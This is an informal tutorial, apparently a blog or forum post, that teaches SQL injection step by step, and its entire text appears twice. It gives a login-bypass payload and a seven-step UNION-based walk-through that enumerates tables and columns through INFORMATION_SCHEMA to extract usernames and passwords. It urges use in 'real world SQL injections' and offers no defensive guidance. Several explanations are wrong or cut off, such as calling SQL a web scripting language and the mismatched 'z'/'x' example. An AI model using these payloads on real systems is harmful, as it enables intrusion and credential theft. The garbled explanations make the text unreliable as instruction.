Hlw friends today we are going to know something about SQL Injection,its use vulnerabilities, hoe sql works, what are the commands to make a sql works
SQL and Its Use:
-SQL is a web scripting (computer) language.
-SQL is used to make websites.
-SQL stands for Structured Query Language.
-SQL is used to insert, display and store information from a website on a server.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Tables:
-In an SQL database there are tables which store information. -Tables can store any information on a website, ranging from usernames,
passwords, and addresses, to text displayed on a webpage, such as a link or page header.
-Tables have columns in which the records (information) are kept.
-Each table has a name and each column has a name.
-SQL injection means to modify one or more of these tables.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerabilities:
-SQL injection vulnerabilities come in two main forms.
-Both forms involve injecting SQL code into a website.
-To "inject SQL code" means to "write SQL language".
-By writing SQL language into the site, the website will do what you tell it to do, and you will be able to achieve your goals.
- (1) Injecting into a form. Such as username and password boxes on a login page.
- (2) Injecting into a URL. Like www.site.com/news.asp?ArticleID=10
------------------------------------------------------------------------------------------------------------------------------------------------------------
Goals:
-Your goal as an injector is to outsmart the SQL server.
-By outsmarting the SQL server you may able to display information from the site's tables on your screen.
-You may also be able to add and delete information from the tables.
-In addition, you may be able to bypass certain security measures, like logging in to a site without knowing a real username and password.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
How SQL Works:
-Before you can perform an injection, you must first understand how SQL works.
-When you register a new username and password on a website, the username and password you entered is kept in the site's member table; the username and password are put in their separate columns.
-When you log in with the username and password you registered, the login page looks for a row in the member table that has the same username and password that you supplied.
-The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.
-If a row exists that has both the same username and password, then you are allowed to go on your account.
-If no row is found, the login page will tell you that the account you specified does not exist, or that your username and password is wrong.
-SQL can also display information on a website.
-If a site has a news section, there may be an SQL table that, for example, holds all of the article names.
-More often than not, articles on a website are identified by a number.
-When you click on a link to an article, you are usually able to see the number of the article you clicked on by looking at the URL of the page you are on.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Commands:
(a) What They Are and What to Look for:
-By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record.
-In a command, you must specify what you want to do and to what you want to do it.
-If you are injecting into a URL (link) you place your command after the "=" sign in the URL.
-If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password.
-The website will read what you type and treat it as a command and will do whatever you tell it to do.
-The possibilities are virtually endless; some examples are reading, changing and adding usernames and passwords on a website, and changing the words on the pages of the website.
(b) Familiarization and Syntax : -The manner in which you write commands is called syntax. -You must use the right syntax in order for the SQL server to understand what
you want it to do.
-Familiarize yourself with the following commands, and use them throughout this paper and during real world SQL injections.
-Do not worry about correct syntax yet. You will come to learn and eventually memorize it, as you practice and study examples later on in this paper.
-Memorization through understanding will benefit you in the long run. -You will see a language, not just words on a screen.
-Not all commands that you will see and use will be listed below.
-You will soon see other (somewhat confusing) commands, know what they do and how to use them, but probably not understand why they work.
-For the sake of simplicity, those commands and their uses have been omitted from the following list.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Form Injection:
-The easiest SQL injection to perform is called "Authorization Bypass."
-"Authorization Bypass" refers to SQL injecting into the boxes where you enter your username and password on a website, a.k.a., a login form.
-As you may recall, in the "How SQL Works" section, login pages check to see if the information that you supplied is a true statement that will return any rows from the member table.
-We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row.
-The username and password boxes are each surrounded by invisible single quotes.
-Whatever is surrounded by the invisible single quotes when the form is submitted is what the site looks for in the member table. See Figure C
-If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error.
-For example, if you submit z' (the letter z followed by a single quote) an error will occur because there is an unclosed quotation mark. See Figure D
-It is important to remember that there are two invisible quotation marks already surrounding each box that you type in.
-Now, let's try submitting the following z' OR 'x'='x.
-In plain English, SQL aside, z' OR 'z'='z tells the server to look for any row with 'z' as the username in the member table or any row where the letter 'x' is the same as 'x'. See Figure E
-This is a true statement because in every row, table, column and language, the letter x is the same as the letter x.
-According to the SQL server, this is a valid username because x is the same as x in every row.
-As strange as it may look, you have satisfied the SQL server's requirements, which are, make sure the username supplied exists in the member table.
-Supply this as both the username and password, and you will be successfully logged in to the website.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Attack 1
GOAL: Obtain a username and password. Vulnerable URL: www.site.com/news.asp?ArticleID=10
STEP 1: Determine if link is vulnerable.
a. www.site.com/news.asp?ArticleID=10+AND+1=0--
-Command Translation: Display article 10 only if the number 1 is the same as the number 0.
-In this case, the "AND" command means that in order for the article to be shown, article 10 must exist AND 1 must equal 0.
-This should cause the article to not load because 1 is not the same as 0.
b. www.site.com/news.asp?ArticleID=10+AND+1=1--
-Command Translation: Display article 10 only if the number 1 is the same as the number 1.
-The article should be shown on the page now because article 10 exists AND 1 is equal to 1.
*Since the article loads when you want it to, and doesn't load when you don't want it to, our commands must be working! This means the link is vulnerable and we can continue!*
STEP 2: Find total number of columns displayed on the page.
a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1--
-"ORDER BY 1" (where "1" is the column number) tells the page to display the first column on the page first.
-"ORDER BY 2" would display the second column on the page first.
b. Repeat step 2a, increasing the number "1" by one each time until you receive an error.
i. Stop when you get an error message, subtract one from this number and record it.
-For example, if you receive an error when you reach the number "4" (www.site.com/news.asp?ArticleID=10+ORDER+BY+4--), subtract one from "4" to get 3.
ii. You have now discovered that there are 3 total columns on the page.
STEP 3: Displaying table names.
*Use the "The INFORMATION_SCHEMA" section as a reference for steps 3 and 4*
a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
-Command Reminder: "SELECT" tells the website to display the information that you specify from the table that you specify.
-Notice: You must change the original article number (10) to negative one.
-Notice: The final number from step 2b (in our case, 3) is correctly inserted into the above command by listing the number "1" to the final number, separating each with a comma.
-You should now see at least one of the numbers you have listed in the command above displayed somewhere on the webpage.
-From here on, you may only replace numbers in the URL with other words if they have been displayed on the webpage.
b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES--
-Reminder: You may replace any number that was displayed on the webpage (preferably only one of them) with "table_name." -Command Translation: Show me the name of a table. -A table name, instead of one of the numbers (in our case the number "2"), should be displayed on the webpage. STEP 4: Find target table name. a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+ WHERE+table_name>'displayed_table'--
-Odds are that the first displayed table_name is not the one you are looking for; you are looking for the table that stores usernames and passwords.
-To navigate a table list to find the right table, add "+WHERE+table_name>'displayed_table' " (" 'displayed_table' " = the wrong table name that is being shown) after "TABLES."
-Command Translation: Display the name of the next table in the list after 'displayed_table.'
b. Repeat step 4a until a reasonable name for a members table is displayed.
-For our attack, let’s say we have found a table named
c. Remember the table name from step 4b, write it down if
STEP 5: Displaying column names.
a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_S CHEMA.COLUMNS+WHERE+table_name='UserAccounts'--
-Command Translation: Show me the names of the columns in the table "UserAccounts"
-Now, instead of a table_name being displayed, you will see the name of a column in the table "UserAccounts" being displayed.
STEP 6: Find target columns.
a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,column_ name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='User Accounts'+AND+column_name>'displayed_column'--
-As in step 4, you will need to find the names of useful columns.
-If you are looking for usernames and passwords, you should try to find columns named username, password, user, pass, login_name, etc...
-Command Translation: Display the name of the next column in the list after 'displayed_column.'
b. Repeat step 6a until you find the right column names.
-For our example attack, we will imagine that we have come across columns named "username" and "password".
c. Remember the column names from step 6b, write them down if necessary.
STEP 7: Displaying records (finally!).
*For this step, have available the table and column names which you have written down.*
Table Name: "UserAccounts"
Column Names: "username" "password"
a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,username,3+ FROM+UserAccounts--
-Command Translation: Display the first record in the column "username" from the table "UserAccounts." -Let's say the webpage displays the username "Adam"
b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE +username='Adam'--
-Command Translation: Display the password for the username "Adam" that is stored in the table UserAccounts.
-In our hypothetical attack, the webpage has displayed "neo."
c. You have found the password for the username "Adam", which is "neo."
- Username: Adam - Password: neo
You have just completed your first SQL injection attack!
SQL and Its Use:
-SQL is a web scripting (computer) language.
-SQL is used to make websites.
-SQL stands for Structured Query Language.
-SQL is used to insert, display and store information from a website on a server.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Tables:
-In an SQL database there are tables which store information. -Tables can store any information on a website, ranging from usernames,
passwords, and addresses, to text displayed on a webpage, such as a link or page header.
-Tables have columns in which the records (information) are kept.
-Each table has a name and each column has a name.
-SQL injection means to modify one or more of these tables.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerabilities:
-SQL injection vulnerabilities come in two main forms.
-Both forms involve injecting SQL code into a website.
-To "inject SQL code" means to "write SQL language".
-By writing SQL language into the site, the website will do what you tell it to do, and you will be able to achieve your goals.
- (1) Injecting into a form. Such as username and password boxes on a login page.
- (2) Injecting into a URL. Like www.site.com/news.asp?ArticleID=10
------------------------------------------------------------------------------------------------------------------------------------------------------------
Goals:
-Your goal as an injector is to outsmart the SQL server.
-By outsmarting the SQL server you may able to display information from the site's tables on your screen.
-You may also be able to add and delete information from the tables.
-In addition, you may be able to bypass certain security measures, like logging in to a site without knowing a real username and password.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
How SQL Works:
-Before you can perform an injection, you must first understand how SQL works.
-When you register a new username and password on a website, the username and password you entered is kept in the site's member table; the username and password are put in their separate columns.
-When you log in with the username and password you registered, the login page looks for a row in the member table that has the same username and password that you supplied.
-The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.
-If a row exists that has both the same username and password, then you are allowed to go on your account.
-If no row is found, the login page will tell you that the account you specified does not exist, or that your username and password is wrong.
-SQL can also display information on a website.
-If a site has a news section, there may be an SQL table that, for example, holds all of the article names.
-More often than not, articles on a website are identified by a number.
-When you click on a link to an article, you are usually able to see the number of the article you clicked on by looking at the URL of the page you are on.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Commands:
(a) What They Are and What to Look for:
-By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record.
-In a command, you must specify what you want to do and to what you want to do it.
-If you are injecting into a URL (link) you place your command after the "=" sign in the URL.
-If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password.
-The website will read what you type and treat it as a command and will do whatever you tell it to do.
-The possibilities are virtually endless; some examples are reading, changing and adding usernames and passwords on a website, and changing the words on the pages of the website.
(b) Familiarization and Syntax : -The manner in which you write commands is called syntax. -You must use the right syntax in order for the SQL server to understand what
you want it to do.
-Familiarize yourself with the following commands, and use them throughout this paper and during real world SQL injections.
-Do not worry about correct syntax yet. You will come to learn and eventually memorize it, as you practice and study examples later on in this paper.
-Memorization through understanding will benefit you in the long run. -You will see a language, not just words on a screen.
-Not all commands that you will see and use will be listed below.
-You will soon see other (somewhat confusing) commands, know what they do and how to use them, but probably not understand why they work.
-For the sake of simplicity, those commands and their uses have been omitted from the following list.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Form Injection:
-The easiest SQL injection to perform is called "Authorization Bypass."
-"Authorization Bypass" refers to SQL injecting into the boxes where you enter your username and password on a website, a.k.a., a login form.
-As you may recall, in the "How SQL Works" section, login pages check to see if the information that you supplied is a true statement that will return any rows from the member table.
-We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row.
-The username and password boxes are each surrounded by invisible single quotes.
-Whatever is surrounded by the invisible single quotes when the form is submitted is what the site looks for in the member table. See Figure C
-If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error.
-For example, if you submit z' (the letter z followed by a single quote) an error will occur because there is an unclosed quotation mark. See Figure D
-It is important to remember that there are two invisible quotation marks already surrounding each box that you type in.
-Now, let's try submitting the following z' OR 'x'='x.
-In plain English, SQL aside, z' OR 'z'='z tells the server to look for any row with 'z' as the username in the member table or any row where the letter 'x' is the same as 'x'. See Figure E
-This is a true statement because in every row, table, column and language, the letter x is the same as the letter x.
-According to the SQL server, this is a valid username because x is the same as x in every row.
-As strange as it may look, you have satisfied the SQL server's requirements, which are, make sure the username supplied exists in the member table.
-Supply this as both the username and password, and you will be successfully logged in to the website.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Attack 1
GOAL: Obtain a username and password. Vulnerable URL: www.site.com/news.asp?ArticleID=10
STEP 1: Determine if link is vulnerable.
a. www.site.com/news.asp?ArticleID=10+AND+1=0--
-Command Translation: Display article 10 only if the number 1 is the same as the number 0.
-In this case, the "AND" command means that in order for the article to be shown, article 10 must exist AND 1 must equal 0.
-This should cause the article to not load because 1 is not the same as 0.
b. www.site.com/news.asp?ArticleID=10+AND+1=1--
-Command Translation: Display article 10 only if the number 1 is the same as the number 1.
-The article should be shown on the page now because article 10 exists AND 1 is equal to 1.
*Since the article loads when you want it to, and doesn't load when you don't want it to, our commands must be working! This means the link is vulnerable and we can continue!*
STEP 2: Find total number of columns displayed on the page.
a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1--
-"ORDER BY 1" (where "1" is the column number) tells the page to display the first column on the page first.
-"ORDER BY 2" would display the second column on the page first.
b. Repeat step 2a, increasing the number "1" by one each time until you receive an error.
i. Stop when you get an error message, subtract one from this number and record it.
-For example, if you receive an error when you reach the number "4" (www.site.com/news.asp?ArticleID=10+ORDER+BY+4--), subtract one from "4" to get 3.
ii. You have now discovered that there are 3 total columns on the page.
STEP 3: Displaying table names.
*Use the "The INFORMATION_SCHEMA" section as a reference for steps 3 and 4*
a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
-Command Reminder: "SELECT" tells the website to display the information that you specify from the table that you specify.
-Notice: You must change the original article number (10) to negative one.
-Notice: The final number from step 2b (in our case, 3) is correctly inserted into the above command by listing the number "1" to the final number, separating each with a comma.
-You should now see at least one of the numbers you have listed in the command above displayed somewhere on the webpage.
-From here on, you may only replace numbers in the URL with other words if they have been displayed on the webpage.
b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES--
-Reminder: You may replace any number that was displayed on the webpage (preferably only one of them) with "table_name." -Command Translation: Show me the name of a table. -A table name, instead of one of the numbers (in our case the number "2"), should be displayed on the webpage. STEP 4: Find target table name. a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+ WHERE+table_name>'displayed_table'--
-Odds are that the first displayed table_name is not the one you are looking for; you are looking for the table that stores usernames and passwords.
-To navigate a table list to find the right table, add "+WHERE+table_name>'displayed_table' " (" 'displayed_table' " = the wrong table name that is being shown) after "TABLES."
-Command Translation: Display the name of the next table in the list after 'displayed_table.'
b. Repeat step 4a until a reasonable name for a members table is displayed.
-For our attack, let’s say we have found a table named
c. Remember the table name from step 4b, write it down if
STEP 5: Displaying column names.
a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_S CHEMA.COLUMNS+WHERE+table_name='UserAccounts'--
-Command Translation: Show me the names of the columns in the table "UserAccounts"
-Now, instead of a table_name being displayed, you will see the name of a column in the table "UserAccounts" being displayed.
STEP 6: Find target columns.
a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,column_ name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='User Accounts'+AND+column_name>'displayed_column'--
-As in step 4, you will need to find the names of useful columns.
-If you are looking for usernames and passwords, you should try to find columns named username, password, user, pass, login_name, etc...
-Command Translation: Display the name of the next column in the list after 'displayed_column.'
b. Repeat step 6a until you find the right column names.
-For our example attack, we will imagine that we have come across columns named "username" and "password".
c. Remember the column names from step 6b, write them down if necessary.
STEP 7: Displaying records (finally!).
*For this step, have available the table and column names which you have written down.*
Table Name: "UserAccounts"
Column Names: "username" "password"
a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,username,3+ FROM+UserAccounts--
-Command Translation: Display the first record in the column "username" from the table "UserAccounts." -Let's say the webpage displays the username "Adam"
b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE +username='Adam'--
-Command Translation: Display the password for the username "Adam" that is stored in the table UserAccounts.
-In our hypothetical attack, the webpage has displayed "neo."
c. You have found the password for the username "Adam", which is "neo."
- Username: Adam - Password: neo
You have just completed your first SQL injection attack!
